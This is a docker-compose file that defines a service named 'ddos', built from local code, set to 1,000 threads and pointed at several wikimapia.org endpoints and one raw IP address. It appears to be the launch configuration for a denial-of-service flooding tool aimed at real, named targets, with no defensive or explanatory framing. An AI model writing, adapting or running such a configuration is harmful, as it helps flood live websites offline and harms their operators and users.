version: '3.7'

services:
  ddos:
    build:
      context: .
    environment:
      THREADS: "1000"
      URIES: "https://wikimapia.org/infu/,https://wikimapia.org/z1/itiles/,https://wikimapia.org,https://185.169.155.16/"      